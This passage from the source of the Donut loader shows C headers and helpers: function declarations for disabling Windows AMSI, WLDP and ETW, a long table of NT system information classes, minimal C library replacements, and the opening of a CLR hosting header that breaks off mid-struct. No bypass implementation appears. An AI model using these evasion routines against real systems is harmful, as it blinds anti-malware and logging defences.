8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef BYPASS_H
32 #define BYPASS_H
33
34 //#include <ntstatus.h>
35
36 // Disables Antimalware Scan Interface
37 BOOL DisableAMSI(PDONUT_INSTANCE);
38
39 // Disables Windows Lockdown Policy
40 BOOL DisableWLDP(PDONUT_INSTANCE);
41
42 // Disables ETW
43 BOOL DisableETW(PDONUT_INSTANCE);
44
45 // Use by BYPASS_WLDP_A
46 typedef enum _WLDP_HOST_ID {
47 WLDP_HOST_ID_UNKNOWN = 0,
48 WLDP_HOST_ID_GLOBAL = 1,
49 WLDP_HOST_ID_VBA = 2,
50 WLDP_HOST_ID_WSH = 3,
51 WLDP_HOST_ID_POWERSHELL = 4,
52 WLDP_HOST_ID_IE = 5,
53 WLDP_HOST_ID_MSI = 6,
54 WLDP_HOST_ID_MAX = 7
55 } WLDP_HOST_ID, * PWLDP_HOST_ID;
56
57 typedef struct _WLDP_HOST_INFORMATION {
58 DWORD dwRevision;
59 WLDP_HOST_ID dwHostId;
60 PCWSTR szSource;
61 HANDLE hSource;
62 } WLDP_HOST_INFORMATION, * PWLDP_HOST_INFORMATION;
63
64 // Used by BYPASS_ETW_B
65 typedef enum _SYSTEM_INFORMATION_CLASS
66 {
67 SystemBasicInformation, // q: SYSTEM_BASIC_INFORMATION
68 SystemProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION
69 SystemPerformanceInformation, // q: SYSTEM_PERFORMANCE_INFORMATION
70 SystemTimeOfDayInformation, // q: SYSTEM_TIMEOFDAY_INFORMATION
71 SystemPathInformation, // not implemented
72 SystemProcessInformation, // q: SYSTEM_PROCESS_INFORMATION
73 SystemCallCountInformation, // q: SYSTEM_CALL_COUNT_INFORMATION
74 SystemDeviceInformation, // q: SYSTEM_DEVICE_INFORMATION
75 SystemProcessorPerformanceInformation, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION
76 SystemFlagsInformation, // q: SYSTEM_FLAGS_INFORMATION
77 SystemCallTimeInformation, // not implemented // SYSTEM_CALL_TIME_INFORMATION // 10
78 SystemModuleInformation, // q: RTL_PROCESS_MODULES
79 SystemLocksInformation, // q: RTL_PROCESS_LOCKS
80 SystemStackTraceInformation, // q: RTL_PROCESS_BACKTRACES
81 SystemPagedPoolInformation, // not implemented
82 SystemNonPagedPoolInformation, // not implemented
83 SystemHandleInformation, // q: SYSTEM_HANDLE_INFORMATION
84 SystemObjectInformation, // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION
85 SystemPageFileInformation, // q: SYSTEM_PAGEFILE_INFORMATION
86 SystemVdmInstemulInformation, // q: SYSTEM_VDM_INSTEMUL_INFO
87 SystemVdmBopInformation, // not implemented // 20
88 SystemFileCacheInformation, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache)
89 SystemPoolTagInformation, // q: SYSTEM_POOLTAG_INFORMATION
90 SystemInterruptInformation, // q: SYSTEM_INTERRUPT_INFORMATION
91 SystemDpcBehaviorInformation, // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege)
92 SystemFullMemoryInformation, // not implemented
93 SystemLoadGdiDriverInformation, // s (kernel-mode only)
94 SystemUnloadGdiDriverInformation, // s (kernel-mode only)
95 SystemTimeAdjustmentInformation, // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege)
96 SystemSummaryMemoryInformation, // not implemented
97 SystemMirrorMemoryInformation, // s (requires license value "Kernel-MemoryMirroringSupported") (requires SeShutdownPrivilege) // 30
98 SystemPerformanceTraceInformation, // q; s: (type depends on EVENT_TRACE_INFORMATION_CLASS)
99 SystemObsolete0, // not implemented
100 SystemExceptionInformation, // q: SYSTEM_EXCEPTION_INFORMATION
101 SystemCrashDumpStateInformation, // s: SYSTEM_CRASH_DUMP_STATE_INFORMATION (requires SeDebugPrivilege)
102 SystemKernelDebuggerInformation, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION
103 SystemContextSwitchInformation, // q: SYSTEM_CONTEXT_SWITCH_INFORMATION
104 SystemRegistryQuotaInformation, // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege)
105 SystemExtendServiceTableInformation, // s (requires SeLoadDriverPrivilege) // loads win32k only
106 SystemPrioritySeperation, // s (requires SeTcbPrivilege)
107 SystemVerifierAddDriverInformation, // s (requires SeDebugPrivilege) // 40
108 SystemVerifierRemoveDriverInformation, // s (requires SeDebugPrivilege)
109 SystemProcessorIdleInformation, // q: SYSTEM_PROCESSOR_IDLE_INFORMATION
110 SystemLegacyDriverInformation, // q: SYSTEM_LEGACY_DRIVER_INFORMATION
111 SystemCurrentTimeZoneInformation, // q; s: RTL_TIME_ZONE_INFORMATION
112 SystemLookasideInformation, // q: SYSTEM_LOOKASIDE_INFORMATION
113 SystemTimeSlipNotification, // s (requires SeSystemtimePrivilege)
114 SystemSessionCreate, // not implemented
115 SystemSessionDetach, // not implemented
116 SystemSessionInformation, // not implemented (SYSTEM_SESSION_INFORMATION)
117 SystemRangeStartInformation, // q: SYSTEM_RANGE_START_INFORMATION // 50
118 SystemVerifierInformation, // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege)
119 SystemVerifierThunkExtend, // s (kernel-mode only)
120 SystemSessionProcessInformation, // q: SYSTEM_SESSION_PROCESS_INFORMATION
121 SystemLoadGdiDriverInSystemSpace, // s (kernel-mode only) (same as SystemLoadGdiDriverInformation)
122 SystemNumaProcessorMap, // q
123 SystemPrefetcherInformation, // q: PREFETCHER_INFORMATION; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation
124 SystemExtendedProcessInformation, // q: SYSTEM_PROCESS_INFORMATION
125 SystemRecommendedSharedDataAlignment, // q
126 SystemComPlusPackage, // q; s
127 SystemNumaAvailableMemory, // 60
128 SystemProcessorPowerInformation, // q: SYSTEM_PROCESSOR_POWER_INFORMATION
129 SystemEmulationBasicInformation,
130 SystemEmulationProcessorInformation,
131 SystemExtendedHandleInformation, // q: SYSTEM_HANDLE_INFORMATION_EX
132 SystemLostDelayedWriteInformation, // q: ULONG
133 SystemBigPoolInformation, // q: SYSTEM_BIGPOOL_INFORMATION
134 SystemSessionPoolTagInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION
135 SystemSessionMappedViewInformation, // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION
136 SystemHotpatchInformation, // q; s: SYSTEM_HOTPATCH_CODE_INFORMATION
137 SystemObjectSecurityMode, // q: ULONG // 70
138 SystemWatchdogTimerHandler, // s (kernel-mode only)
139 SystemWatchdogTimerInformation, // q (kernel-mode only); s (kernel-mode only)
140 SystemLogicalProcessorInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION
141 SystemWow64SharedInformationObsolete, // not implemented
142 SystemRegisterFirmwareTableInformationHandler, // s: SYSTEM_FIRMWARE_TABLE_HANDLER // (kernel-mode only)
143 SystemFirmwareTableInformation, // SYSTEM_FIRMWARE_TABLE_INFORMATION
144 SystemModuleInformationEx, // q: RTL_PROCESS_MODULE_INFORMATION_EX
145 SystemVerifierTriageInformation, // not implemented
146 SystemSuperfetchInformation, // q; s: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation
147 SystemMemoryListInformation, // q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege) // 80
148 SystemFileCacheInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation)
149 SystemThreadPriorityClientIdInformation, // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege)
150 SystemProcessorIdleCycleTimeInformation, // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[]
151 SystemVerifierCancellationInformation, // SYSTEM_VERIFIER_CANCELLATION_INFORMATION // name:wow64:whNT32QuerySystemVerifierCancellationInformation
152 SystemProcessorPowerInformationEx, // not implemented
153 SystemRefTraceInformation, // q; s: SYSTEM_REF_TRACE_INFORMATION // ObQueryRefTraceInformation
154 SystemSpecialPoolInformation, // q; s: SYSTEM_SPECIAL_POOL_INFORMATION (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0
155 SystemProcessIdInformation, // q: SYSTEM_PROCESS_ID_INFORMATION
156 SystemErrorPortInformation, // s (requires SeTcbPrivilege)
157 SystemBootEnvironmentInformation, // q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION // 90
158 SystemHypervisorInformation, // q; s (kernel-mode only)
159 SystemVerifierInformationEx, // q; s: SYSTEM_VERIFIER_INFORMATION_EX
160 SystemTimeZoneInformation, // s (requires SeTimeZonePrivilege)
161 SystemImageFileExecutionOptionsInformation, // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege)
162 SystemCoverageInformation, // q; s // name:wow64:whNT32QuerySystemCoverageInformation; ExpCovQueryInformation
163 SystemPrefetchPatchInformation, // SYSTEM_PREFETCH_PATCH_INFORMATION
164 SystemVerifierFaultsInformation, // s: SYSTEM_VERIFIER_FAULTS_INFORMATION (requires SeDebugPrivilege)
165 SystemSystemPartitionInformation, // q: SYSTEM_SYSTEM_PARTITION_INFORMATION
166 SystemSystemDiskInformation, // q: SYSTEM_SYSTEM_DISK_INFORMATION
167 SystemProcessorPerformanceDistribution, // q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION // 100
168 SystemNumaProximityNodeInformation,
169 SystemDynamicTimeZoneInformation, // q; s (requires SeTimeZonePrivilege)
170 SystemCodeIntegrityInformation, // q: SYSTEM_CODEINTEGRITY_INFORMATION // SeCodeIntegrityQueryInformation
171 SystemProcessorMicrocodeUpdateInformation, // s: SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION
172 SystemProcessorBrandString, // q // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23
173 SystemVirtualAddressInformation, // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation
174 SystemLogicalProcessorAndGroupInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // since WIN7 // KeQueryLogicalProcessorRelationship
175 SystemProcessorCycleTimeInformation, // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[]
176 SystemStoreInformation, // q; s: SYSTEM_STORE_INFORMATION // SmQueryStoreInformation
177 SystemRegistryAppendString, // s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // 110
178 SystemAitSamplingValue, // s: ULONG (requires SeProfileSingleProcessPrivilege)
179 SystemVhdBootInformation, // q: SYSTEM_VHD_BOOT_INFORMATION
180 SystemCpuQuotaInformation, // q; s // PsQueryCpuQuotaInformation
181 SystemNativeBasicInformation, // not implemented
182 SystemErrorPortTimeouts, // SYSTEM_ERROR_PORT_TIMEOUTS
183 SystemLowPriorityIoInformation, // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION
184 SystemTpmBootEntropyInformation, // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation
185 SystemVerifierCountersInformation, // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION
186 SystemPagedPoolInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool)
187 SystemSystemPtesInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) // 120
188 SystemNodeDistanceInformation,
189 SystemAcpiAuditInformation, // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26
190 SystemBasicPerformanceInformation, // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation
191 SystemQueryPerformanceCounterInformation, // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1
192 SystemSessionBigPoolInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION // since WIN8
193 SystemBootGraphicsInformation, // q; s: SYSTEM_BOOT_GRAPHICS_INFORMATION (kernel-mode only)
194 SystemScrubPhysicalMemoryInformation, // q; s: MEMORY_SCRUB_INFORMATION
195 SystemBadPageInformation,
196 SystemProcessorProfileControlArea, // q; s: SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA
197 SystemCombinePhysicalMemoryInformation, // s: MEMORY_COMBINE_INFORMATION, MEMORY_COMBINE_INFORMATION_EX, MEMORY_COMBINE_INFORMATION_EX2 // 130
198 SystemEntropyInterruptTimingInformation,
199 SystemConsoleInformation, // q: SYSTEM_CONSOLE_INFORMATION
200 SystemPlatformBinaryInformation, // q: SYSTEM_PLATFORM_BINARY_INFORMATION
201 SystemPolicyInformation, // SYSTEM_POLICY_INFORMATION
202 SystemHypervisorProcessorCountInformation, // q: SYSTEM_HYPERVISOR_PROCESSOR_COUNT_INFORMATION
203 SystemDeviceDataInformation, // q: SYSTEM_DEVICE_DATA_INFORMATION
204 SystemDeviceDataEnumerationInformation, // q: SYSTEM_DEVICE_DATA_INFORMATION
205 SystemMemoryTopologyInformation, // q: SYSTEM_MEMORY_TOPOLOGY_INFORMATION
206 SystemMemoryChannelInformation, // q: SYSTEM_MEMORY_CHANNEL_INFORMATION
207 SystemBootLogoInformation, // q: SYSTEM_BOOT_LOGO_INFORMATION // 140
208 SystemProcessorPerformanceInformationEx, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // since WINBLUE
209 SystemCriticalProcessErrorLogInformation,
210 SystemSecureBootPolicyInformation, // q: SYSTEM_SECUREBOOT_POLICY_INFORMATION
211 SystemPageFileInformationEx, // q: SYSTEM_PAGEFILE_INFORMATION_EX
212 SystemSecureBootInformation, // q: SYSTEM_SECUREBOOT_INFORMATION
213 SystemEntropyInterruptTimingRawInformation,
214 SystemPortableWorkspaceEfiLauncherInformation, // q: SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION
215 SystemFullProcessInformation, // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin)
216 SystemKernelDebuggerInformationEx, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX
217 SystemBootMetadataInformation, // 150
218 SystemSoftRebootInformation, // q: ULONG
219 SystemElamCertificateInformation, // s: SYSTEM_ELAM_CERTIFICATE_INFORMATION
220 SystemOfflineDumpConfigInformation,
221 SystemProcessorFeaturesInformation, // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION
222 SystemRegistryReconciliationInformation, // s: NULL (requires admin) (flushes registry hives)
223 SystemEdidInformation,
224 SystemManufacturingInformation, // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD
225 SystemEnergyEstimationConfigInformation, // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION
226 SystemHypervisorDetailInformation, // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION
227 SystemProcessorCycleStatsInformation, // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION // 160
228 SystemVmGenerationCountInformation,
229 SystemTrustedPlatformModuleInformation, // q: SYSTEM_TPM_INFORMATION
230 SystemKernelDebuggerFlags, // SYSTEM_KERNEL_DEBUGGER_FLAGS
231 SystemCodeIntegrityPolicyInformation, // q: SYSTEM_CODEINTEGRITYPOLICY_INFORMATION
232 SystemIsolatedUserModeInformation, // q: SYSTEM_ISOLATED_USER_MODE_INFORMATION
233 SystemHardwareSecurityTestInterfaceResultsInformation,
234 SystemSingleModuleInformation, // q: SYSTEM_SINGLE_MODULE_INFORMATION
235 SystemAllowedCpuSetsInformation,
236 SystemVsmProtectionInformation, // q: SYSTEM_VSM_PROTECTION_INFORMATION (previously SystemDmaProtectionInformation)
237 SystemInterruptCpuSetsInformation, // q: SYSTEM_INTERRUPT_CPU_SET_INFORMATION // 170
238 SystemSecureBootPolicyFullInformation, // q: SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION
239 SystemCodeIntegrityPolicyFullInformation,
240 SystemAffinitizedInterruptProcessorInformation,
241 SystemRootSiloInformation, // q: SYSTEM_ROOT_SILO_INFORMATION
242 SystemCpuSetInformation, // q: SYSTEM_CPU_SET_INFORMATION // since THRESHOLD2
243 SystemCpuSetTagInformation, // q: SYSTEM_CPU_SET_TAG_INFORMATION
244 SystemWin32WerStartCallout,
245 SystemSecureKernelProfileInformation, // q: SYSTEM_SECURE_KERNEL_HYPERGUARD_PROFILE_INFORMATION
246 SystemCodeIntegrityPlatformManifestInformation, // q: SYSTEM_SECUREBOOT_PLATFORM_MANIFEST_INFORMATION // since REDSTONE
247 SystemInterruptSteeringInformation, // SYSTEM_INTERRUPT_STEERING_INFORMATION_INPUT // 180
248 SystemSupportedProcessorArchitectures,
249 SystemMemoryUsageInformation, // q: SYSTEM_MEMORY_USAGE_INFORMATION
250 SystemCodeIntegrityCertificateInformation, // q: SYSTEM_CODEINTEGRITY_CERTIFICATE_INFORMATION
251 SystemPhysicalMemoryInformation, // q: SYSTEM_PHYSICAL_MEMORY_INFORMATION // since REDSTONE2
252 SystemControlFlowTransition,
253 SystemKernelDebuggingAllowed, // s: ULONG
254 SystemActivityModerationExeState, // SYSTEM_ACTIVITY_MODERATION_EXE_STATE
255 SystemActivityModerationUserSettings, // SYSTEM_ACTIVITY_MODERATION_USER_SETTINGS
256 SystemCodeIntegrityPoliciesFullInformation,
257 SystemCodeIntegrityUnlockInformation, // SYSTEM_CODEINTEGRITY_UNLOCK_INFORMATION // 190
258 SystemIntegrityQuotaInformation,
259 SystemFlushInformation, // q: SYSTEM_FLUSH_INFORMATION
260 SystemProcessorIdleMaskInformation, // q: ULONG_PTR // since REDSTONE3
261 SystemSecureDumpEncryptionInformation,
262 SystemWriteConstraintInformation, // SYSTEM_WRITE_CONSTRAINT_INFORMATION
263 SystemKernelVaShadowInformation, // SYSTEM_KERNEL_VA_SHADOW_INFORMATION
264 SystemHypervisorSharedPageInformation, // SYSTEM_HYPERVISOR_SHARED_PAGE_INFORMATION // since REDSTONE4
265 SystemFirmwareBootPerformanceInformation,
266 SystemCodeIntegrityVerificationInformation, // SYSTEM_CODEINTEGRITYVERIFICATION_INFORMATION
267 SystemFirmwarePartitionInformation, // SYSTEM_FIRMWARE_PARTITION_INFORMATION // 200
268 SystemSpeculationControlInformation, // SYSTEM_SPECULATION_CONTROL_INFORMATION // (CVE-2017-5715) REDSTONE3 and above.
269 SystemDmaGuardPolicyInformation, // SYSTEM_DMA_GUARD_POLICY_INFORMATION
270 SystemEnclaveLaunchControlInformation, // SYSTEM_ENCLAVE_LAUNCH_CONTROL_INFORMATION
271 SystemWorkloadAllowedCpuSetsInformation, // SYSTEM_WORKLOAD_ALLOWED_CPU_SET_INFORMATION // since REDSTONE5
272 SystemCodeIntegrityUnlockModeInformation,
273 SystemLeapSecondInformation, // SYSTEM_LEAP_SECOND_INFORMATION
274 SystemFlags2Information, // q: SYSTEM_FLAGS_INFORMATION
275 SystemSecurityModelInformation, // SYSTEM_SECURITY_MODEL_INFORMATION // since 19H1
276 SystemCodeIntegritySyntheticCacheInformation,
277 SystemFeatureConfigurationInformation, // SYSTEM_FEATURE_CONFIGURATION_INFORMATION // since 20H1 // 210
278 SystemFeatureConfigurationSectionInformation, // SYSTEM_FEATURE_CONFIGURATION_SECTIONS_INFORMATION
279 SystemFeatureUsageSubscriptionInformation,
280 SystemSecureSpeculationControlInformation, // SECURE_SPECULATION_CONTROL_INFORMATION
281 // SystemSpacesBootInformation = 214,
282 // SystemFwRamdiskInformation = 215,
283 // SystemWheaIpmiHardwareInformation = 216,
284 // SystemDifSetRuleClassInformation = 217,
285 // SystemDifClearRuleClassInformation = 218,
286 // SystemDifApplyPluginVerificationOnDriver = 219,
287 // SystemDifRemovePluginVerificationOnDriver = 220,
288 // SystemShadowStackInformation = 221, // SYSTEM_SHADOW_STACK_INFORMATION
289 // SystemBuildVersionInformation = 222, // SYSTEM_BUILD_VERSION_INFORMATION
290 MaxSystemInfoClass
291 } SYSTEM_INFORMATION_CLASS;
292
293 typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
294 {
295 PVOID Object;
296 ULONG_PTR UniqueProcessId;
297 ULONG_PTR HandleValue;
298 ULONG GrantedAccess;
299 USHORT CreatorBackTraceIndex;
300 USHORT ObjectTypeIndex;
301 ULONG HandleAttributes;
302 ULONG Reserved;
303 } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
304
305 typedef struct _SYSTEM_HANDLE_INFORMATION_EX
306 {
307 ULONG_PTR NumberOfHandles;
308 ULONG_PTR Reserved;
309 SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
310 } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
311
312 #endif
+110
-0
loader/clib.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <inttypes.h>
32 #include <stddef.h>
33
34 // functions to replace intrinsic C library functions
35
36 // funnily enough, MSVC still tries to replace this
37 // with memset hence the use of assembly..
38 void *Memset (void *ptr, int value, uint32_t num) {
39
40 #ifdef _MSC_VER
41 __stosb(ptr, value, num);
42 #else
43 unsigned char *p = (unsigned char*)ptr;
44
45 while(num--) {
46 *p = (unsigned char)value;
47 p++;
48 }
49 #endif
50 return ptr;
51 }
52
53 void *Memcpy (void *destination, const void *source, uint32_t num) {
54 unsigned char *out = (unsigned char*)destination;
55 unsigned char *in = (unsigned char*)source;
56
57 while(num--) {
58 *out = *in;
59 out++; in++;
60 }
61 return destination;
62 }
63
64 int Memcmp(const void *ptr1, const void *ptr2, uint32_t num) {
65 register const unsigned char *s1 = (const unsigned char*)ptr1;
66 register const unsigned char *s2 = (const unsigned char*)ptr2;
67
68 while (num-- > 0) {
69 if (*s1++ != *s2++)
70 return s1[-1] < s2[-1] ? -1 : 1;
71 }
72 return 0;
73 }
74
75 int compare(const char *s1, const char *s2) {
76 while(*s1 && *s2) {
77 if(*s1 != *s2) {
78 return 0;
79 }
80 s1++; s2++;
81 }
82 return *s2 == 0;
83 }
84
85 const char* _strstr(const char *s1, const char *s2) {
86 while (*s1) {
87 if((*s1 == *s2) && compare(s1, s2)) return s1;
88 s1++;
89 }
90 return NULL;
91 }
92
93 int _strcmp(const char *str1, const char *str2) {
94 while (*str1 && *str2) {
95 if(*str1 != *str2) break;
96 str1++; str2++;
97 }
98 return (int)*str1 - (int)*str2;
99 }
100
101 int stricmp(const char *str1, const char *str2) {
102 while (*str1 && *str2) {
103 if ((*str1 | 0x20) != (*str2 | 0x20)) {
104 return 0;
105 }
106 str1++; str2++;
107 }
108 return *str2 == 0;
109 }
+916
-0
loader/clr.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef CLR_H
32 #define CLR_H
33
34 typedef struct _ICLRMetaHost ICLRMetaHost;
35 typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo;
36 typedef struct _ICorRuntimeHost ICorRuntimeHost;
37 typedef struct _ICorConfiguration ICorConfiguration;
38 typedef struct _IGCThreadControl IGCThreadControl;
39 typedef struct _IGCHostControl IGCHostControl;
40 typedef struct _IDebuggerThreadControl IDebuggerThreadControl;
41 typedef struct _AppDomain IAppDomain;
42 typedef struct _Assembly IAssembly;
43 typedef struct _Type IType;
44 typedef struct _Binder IBinder;
45 typedef struct _MethodInfo IMethodInfo;
46
47 typedef void *HDOMAINENUM;
48
49 typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )(
50 REFCLSID clsid,
51 REFIID riid,
52 LPVOID *ppInterface);
53
54 typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )(
55 REFCLSID clsid,
56 REFIID riid,
57 LPVOID *ppInterface);
58
59
60 typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void);
61
62 typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void);
63
64 typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )(
65 ICLRRuntimeInfo *pRuntimeInfo,
66 CallbackThreadSetFnPtr pfnCallbackThreadSet,
67 CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);
68
69 #undef DUMMY_METHOD
70 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
71
72 typedef struct _BinderVtbl {
73 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
74 IBinder * This,
75 /* [in] */ REFIID riid,
76 /* [iid_is][out] */ void **ppvObject);
77
78 ULONG ( STDMETHODCALLTYPE *AddRef )(
79 IBinder * This);
80
